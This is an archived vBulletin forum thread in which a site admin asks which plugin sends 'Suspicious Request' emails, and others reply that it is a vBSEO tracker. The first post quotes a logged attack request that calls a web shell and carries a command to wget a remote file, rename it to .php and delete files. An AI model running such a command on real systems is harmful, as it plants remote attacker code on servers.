Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
  #1  
Old 01-20-2014, 04:49 PM
Art Andrews Art Andrews is offline
 
Join Date: Jan 2005
Posts: 29
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default What plugin generates Suspicious Request Notices?

For the life of me, I can' figure out where these are coming from but I'd like to know more so I can investigate further. From time to time we get an email like the one below:

Email title:
Suspicious Request

Email body:
Cinput: wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip


Forum: http://www.therpf.com

IP: 176.28.49.238
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser 1.1; Windows NT 5.1; (R1 1.5); .NET CLR 2.0.50727; InfoPath.1)
Request: /forum.php//images/stories/racrew.php?cmd=wget%20http://www.allegoriaonline.it/images/incs.txt%20;%20mv%20incs.txt%20incs.php%20;%20rm%2 0-rf%20componentz.zip
User: Unregistered

GET: array (
'cmd' => 'wget http://www.allegoriaonline.it/images/incs.txt ; mv incs.txt incs.php ; rm -rf componentz.zip',
)

POST: array (
'ajax' => NULL,
)

COOKIE: array (
'vbulletin_collapse' => NULL,
'bb_referrerid' => NULL,
'bb_userid' => NULL,
'bb_password' => NULL,
'bb_lastvisit' => NULL,
'bb_lastactivity' => NULL,
'bb_threadedmode' => NULL,
'bb_sessionhash' => NULL,
'bb_userstyleid' => NULL,
'bb_languageid' => NULL,
'bb_skipmobilestyle' => NULL,
'bb_forum_view' => NULL,
'vbulletin_sidebar_collapse' => NULL,
)

I have asked my server admin about it and he said nothing on the server side is doing it and that it is being generated through vB. I can't seem to find any info on it. Please help!
Reply With Quote
  #2  
Old 01-20-2014, 05:57 PM
Lynne's Avatar
Lynne Lynne is offline
 
Join Date: Sep 2004
Location: California/Idaho
Posts: 41,180
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

It's not from default vbulletin. You would need to look through your modifications to see what is generating it.
Reply With Quote
  #3  
Old 01-20-2014, 06:04 PM
Max Taxable's Avatar
Max Taxable Max Taxable is offline
 
Join Date: Feb 2011
Posts: 3,134
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Quote:
User-agent: Mozilla/4.0 (compatible; MSIE 7.0; America Online Browser
It's quite safe to enter the bolded into the definitions of the "Ban Spiders bt User Agent" mod. Anyone still using that needs his/her ass removed anyway, and by the looks of your OP they're up to no good as well.
Reply With Quote
  #4  
Old 01-22-2014, 01:57 PM
Art Andrews Art Andrews is offline
 
Join Date: Jan 2005
Posts: 29
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

I think I may have figured out which plugin is generating this info:

vBSEO Suspicious Activity Tracker

Since vBSEO is no more, I can't really seem to find out anything else about it, but I did find it interesting.
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 01:40 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03648 seconds
  • Memory Usage 2,182KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (4)post_thanks_box
  • (4)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (4)post_thanks_postbit_info
  • (4)postbit
  • (4)postbit_onlinestatus
  • (4)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete